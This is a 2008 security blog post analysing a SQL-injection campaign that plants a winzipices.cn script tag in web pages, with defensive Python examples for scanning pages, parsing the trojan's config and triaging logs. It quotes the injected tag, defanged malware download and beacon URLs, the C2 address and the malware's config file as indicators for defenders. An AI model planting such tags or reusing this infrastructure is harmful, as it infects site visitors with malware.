
Wednesday, 7 May 2008

New SQL Injection Attacks and New Malware: winzipices.cn


Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight: according to Google it has managed to find its way into the source of over 4,000 pages. ISC also has a short diary today mentioning this attack. It turns out this is something we have been looking at for a few days as well, so we would like to share some information that can help protect end users and organizations.

It would appear that the attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, the malware and the malicious file trail here are different from those in the last few attacks. If your website has been hacked, or you are visiting a hacked website, you will find something like this in the HTML source of the page:

	"<script src=hxxp://winzipices.cn/5.js></script>"

It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn writes hidden iframes, which we discuss below.
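To check your own pages for the tag above, here is a small scanner, added here as an example (it is not code from the original post). It lists every external script reference whose host is winzipices.cn, and it deliberately accepts an unquoted src value, because the injected tag is written without quotes and a quote-only pattern misses it. The sample HTML is constructed for the example; the host list is the one named in this post, and the scanner also understands the post's defanged "hxxp://" spelling so the samples above can be fed to it directly.

```python
import re
from urllib.parse import urlsplit

# Hosts named in this post. Extend the set as new domains appear.
MALICIOUS_HOSTS = {"winzipices.cn"}

# The injected tag is written with an UNQUOTED src attribute:
#   <script src=http://winzipices.cn/5.js></script>
# so the pattern accepts double-quoted, single-quoted and bare values.
# A quote-only pattern silently misses the real injection.
_SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def _host_matches(host: str, hosts) -> bool:
    # Exact match or a subdomain of a listed host.
    return any(host == h or host.endswith("." + h) for h in hosts)


def find_injected_scripts(html: str, hosts=MALICIOUS_HOSTS) -> list:
    """Return every <script src=...> URL in `html` whose host is in `hosts`,
    in document order and exactly as written in the page."""
    hits = []
    for m in _SCRIPT_SRC.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        # Accept the post's defanged "hxxp://" so its samples parse too.
        normalized = re.sub(r"^hxxp", "http", src, flags=re.IGNORECASE)
        host = (urlsplit(normalized).hostname or "").lower()
        if host and _host_matches(host, hosts):
            hits.append(src)
    return hits


# Constructed sample page: one legitimate script, then the tag from the
# post appended at the end of the body content.
SAMPLE_HTML = """<html><head>
<script type="text/javascript" src="/js/site.js"></script>
</head><body>
<p>Welcome</p><script src=http://winzipices.cn/5.js></script>
</body></html>"""

if __name__ == "__main__":
    for url in find_injected_scripts(SAMPLE_HTML):
        print("injected script:", url)
```

Run it over exported page source or over a crawl of your own site; a hit means the page content (or the database it is rendered from) already carries the injection and blocking the domain only protects visitors, not the site itself.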

The Malicious File Trail


Visiting a website injected with a winzipices.cn script tag pointing at 1.js, 2.js, 3.js, 4.js, or 5.js results in the following chain of requests:

hxxp://winzipices.cn/5.js writes a hidden iframe linking to hxxp://winzipices.cn/5.asp

hxxp://winzipices.cn/5.asp then writes two more hidden iframes:

hxxp://winzipices.cn/s.asp - appears to be an empty file
hxxp://winzipices.cn/pp.htm - References the JavaScript file "/pp.js"

hxxp://winzipices.cn/pp.js - This file checks whether the browser's User-Agent identifies it as IE6 or IE7. If it does, it attempts to send the browser to one of the following two pages via a hidden iframe:

hxxp://winzipices.cn/6.gif - IE6 users are sent here and then receive three more hidden iframes and a JavaScript file:

 -hxxp://winzipices.cn/le.gif - Has a direct link to the malicious binary at hxxp://61.188.38.158/images/test.exe
 -hxxp://winzipices.cn/vv.js
 -hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll 
 -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

hxxp://winzipices.cn/7.gif - IE7 users are sent here and receive only two of the iframes that IE6 users receive:

 -hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll 
 -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

(5.asp also has a JavaScript reference and clickable image related to traffic stats - links not included)

It would appear that a successful exploit attempt results in a file called "test.exe" being downloaded from 61.188.38.158. This happens to be the same file name used in the recent attacks involving "nihaorr1.com"; however, the binaries are very different.

Another Interesting Discovery


We also noted that requesting invalid files (404 requests) from this server returns two iframes:

hxxp://winzipices.cn/pp.htm - See above as we have already discussed this one
hxxp://winzipices.cn/test.htm - Not what you would expect. This page loads one of the following URLs at random:

 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret1.jpg - with alt tag "sex girl"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret8.jpg - with alt tag "my wow account"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret7.jpg - with alt tag "WOW UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret5.jpg - with alt tag "oh god"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg - with alt tag "UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret2.jpg - with alt tag "UI"
 -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret3.jpg - with alt tag "UI"

These are all screenshots of someone playing World of Warcraft. We are not sure how this plays into everything or why it is there, but it is quite peculiar.

The Malware


In the most recent attacks we blogged about, the malware installed a password stealer that grabbed credentials from systems running Internet Explorer. The malware here is definitely different, and the first executable does not appear to be a password stealer. The binary downloaded by this attack appears to be part of a kit we have seen in the Chinese malware family for some time now. The first thing this malware does once installed is download a configuration file. This configuration file contains several commands and tells the system what to do next; in our instance it tells it to download yet another file and to report in to a URL.

The malware is downloaded from hxxp://61.188.38.158/images/test.exe and, once installed, makes the following requests back to winzipices.cn:

hxxp://winzipices.cn/config.txt - GET request for the configuration file
hxxp://winzipices.cn/1.exe - GET requests for a binary to download and execute
hxxp://winzipices.cn/tong/post.asp?anyehorse=COMPUTER_NAME - GET request to report in the system name

The configuration file for this malware looks like this:

---begin config---


Random:
3455*

Down:
hxx://winzipices.cn/1.exe*

FlipWEB:
*

SendGet:
hxxp://winzipices.cn/tong/post.asp*

InfeWeb:
*

NetBiosInfe:
1*

HDInfe:
0*

InfeExe:
0*

RemovInfe:
1*

RemovableDrive:
1*

FixedDrive:
1*

ReadTime:
1*

OpenSys:
1*


---end config---
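A parser for this configuration layout, added here as an example (it is neither the post's own code nor the malware's). The format is known only from the listing above, so the parser assumes that a line ending in ":" opens a section, that each following non-blank line is one value terminated by "*", and that a bare "*" is an empty section; the sample is the listing above, reproduced with its defanged URLs. The post does not document what the individual switches control, so enabled_flags() only reports which ones are set, and network_iocs() pulls out the URLs (the Down and SendGet entries) that are worth feeding into a blocklist.

```python
import re
from typing import Dict, List

# Constructed sample: the config.txt listing from the post, reproduced
# verbatim. The URLs are defanged in the post and are kept that way here.
SAMPLE_CONFIG = """Random:
3455*

Down:
hxx://winzipices.cn/1.exe*

FlipWEB:
*

SendGet:
hxxp://winzipices.cn/tong/post.asp*

InfeWeb:
*

NetBiosInfe:
1*

HDInfe:
0*

InfeExe:
0*

RemovInfe:
1*

RemovableDrive:
1*

FixedDrive:
1*

ReadTime:
1*

OpenSys:
1*
"""


def parse_config(text: str) -> Dict[str, List[str]]:
    """Parse the 'Key:' / 'value*' layout into {key: [values]}.

    Assumptions (the post shows one value per section, nothing more is
    known): a line ending in ':' opens a section, every following non-blank
    line is one value terminated by '*', and a bare '*' is an empty section.
    Data before the first section header is ignored.
    """
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith(":") and "*" not in line:
            current = line[:-1]
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        if not line.endswith("*"):
            raise ValueError(f"unterminated value in section {current!r}: {raw!r}")
        value = line[:-1].strip()
        if value:
            sections[current].append(value)
    return sections


def network_iocs(sections: Dict[str, List[str]]) -> List[str]:
    """Every value that looks like a URL (any scheme, so the post's
    defanged 'hxx://' and 'hxxp://' spellings are caught as well)."""
    return [v for values in sections.values() for v in values
            if re.match(r"^[a-z]+://", v, re.IGNORECASE)]


def enabled_flags(sections: Dict[str, List[str]]) -> List[str]:
    """Sections whose sole value is '1'. The post does not say what each
    switch controls, so this only reports which ones are turned on."""
    return sorted(k for k, v in sections.items() if v == ["1"])


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("network IOCs:", network_iocs(cfg))
    print("enabled flags:", enabled_flags(cfg))
```

Because the trojan fetches this file over plain HTTP, the same parser can be pointed at a config.txt captured from a proxy cache or packet capture to pull the current download and report-in URLs without running the binary.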

As noted above, this is a malware family we have been seeing for some time. The configuration file drives several different capabilities, including ARP spoofing to inject malicious code into the web pages viewed by other users on the LAN.

The file 1.exe that this trojan then installs makes continuous outbound connections to 61.134.37.15 on port 1800.

Malware Binaries:

File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes

File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes

Protection & Detection


As always, we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods, and being up to date on your patches (here, RealPlayer in particular) also goes a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:

-winzipices.cn [60.191.239.229]
-61.188.38.158
-61.134.37.15

Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names.
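Blocking is the first step; the second is finding the hosts that already talked to this infrastructure, and telling a browser that merely loaded an injected page apart from a machine that is now running the trojan. The triage script below is added as an example (not from the original post). It classifies entries from a constructed proxy log and a constructed connection log by the stage of the chain described above that they correspond to, using only the hosts, paths and port named in this post. The two log formats are invented for the example; adapt the two regular expressions to your own proxy and firewall logs.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Indicators from this post. They rotate quickly, so treat them as a snapshot.
CAMPAIGN_HOSTS = {"winzipices.cn", "60.191.239.229", "61.188.38.158", "61.134.37.15"}
C2_ENDPOINT = ("61.134.37.15", 1800)  # where 1.exe connects after install

# Path patterns, checked in order from "definitely infected" down to
# "merely rendered a hacked page". Hostname has already been matched.
STAGES = [
    (re.compile(r"^/tong/post\.asp$"), "beacon: trojan reporting computer name"),
    (re.compile(r"^/(config\.txt|1\.exe)$"), "beacon: trojan fetching config/second stage"),
    (re.compile(r"^/images/test\.exe$"), "payload: test.exe download, exploit likely succeeded"),
    (re.compile(r"^/(6|7|le|old|xin)\.gif$|^/vv\.js$"), "exploit: RealPlayer exploit pages served"),
    (re.compile(r"^/[1-5]\.(js|asp)$|^/(s\.asp|pp\.htm|pp\.js|test\.htm)$"),
     "landing: browser loaded injected script chain"),
]

# Constructed log formats (assumed for this example):
#   <timestamp> <client> <METHOD> <url> <status>        proxy
#   <timestamp> <client> -> <dst_ip>:<port> TCP          connection log
PROXY_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
CONN_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) -> (?P<dst>[\d.]+):(?P<port>\d+) TCP$")

Finding = Tuple[str, str, str]  # (client, stage label, evidence)


def classify_url(url: str) -> Optional[str]:
    """Stage label for a request to campaign infrastructure, else None."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if host not in CAMPAIGN_HOSTS:
        return None
    for pattern, label in STAGES:
        if pattern.search(u.path):
            return label
    return "contact: other request to campaign host"


def triage(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        m = PROXY_LINE.match(line)
        if m:
            label = classify_url(m["url"])
            if label:
                findings.append((m["client"], label, m["url"]))
            continue
        m = CONN_LINE.match(line)
        if m and m["dst"] in CAMPAIGN_HOSTS:
            dst = (m["dst"], int(m["port"]))
            label = ("c2: 1.exe connecting to 61.134.37.15:1800" if dst == C2_ENDPOINT
                     else "contact: other connection to campaign host")
            findings.append((m["client"], label, f"{m['dst']}:{m['port']}"))
    return findings


def infected_clients(findings: List[Finding]) -> List[str]:
    """Clients with evidence of the trojan itself, not just a page visit."""
    return sorted({c for c, label, _ in findings
                   if label.startswith(("beacon:", "c2:", "payload:"))})


# Constructed sample: 10.0.0.5 walks the whole chain; 10.0.0.9 only loads 3.js.
SAMPLE_LOG = """\
2008-05-07T05:30:01 10.0.0.5 GET http://www.example.com/index.asp 200
2008-05-07T05:30:02 10.0.0.5 GET http://winzipices.cn/5.js 200
2008-05-07T05:30:02 10.0.0.5 GET http://winzipices.cn/pp.js 200
2008-05-07T05:30:03 10.0.0.5 GET http://winzipices.cn/xin.gif 200
2008-05-07T05:30:04 10.0.0.5 GET http://61.188.38.158/images/test.exe 200
2008-05-07T05:30:09 10.0.0.5 GET http://winzipices.cn/config.txt 200
2008-05-07T05:30:10 10.0.0.5 GET http://winzipices.cn/tong/post.asp?anyehorse=WKSTN-17 200
2008-05-07T05:30:12 10.0.0.5 -> 61.134.37.15:1800 TCP
2008-05-07T05:31:00 10.0.0.9 GET http://winzipices.cn/3.js 200
2008-05-07T05:31:00 10.0.0.9 -> 61.134.37.15:443 TCP
""".splitlines()

if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for client, label, evidence in results:
        print(f"{client:10} {label:55} {evidence}")
    print("infected:", infected_clients(results))
```

The ordering of STAGES matters: a request for config.txt or post.asp is made by the installed trojan, never by a browser rendering a hacked page, so those hosts go straight to the reimage queue, while a host that only fetched 5.js and pp.js (and is not running IE6/IE7 with a vulnerable RealPlayer) may have been exposed without being exploited.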

=>Posted May 07, 2008, at 05:34 AM by Steven Adair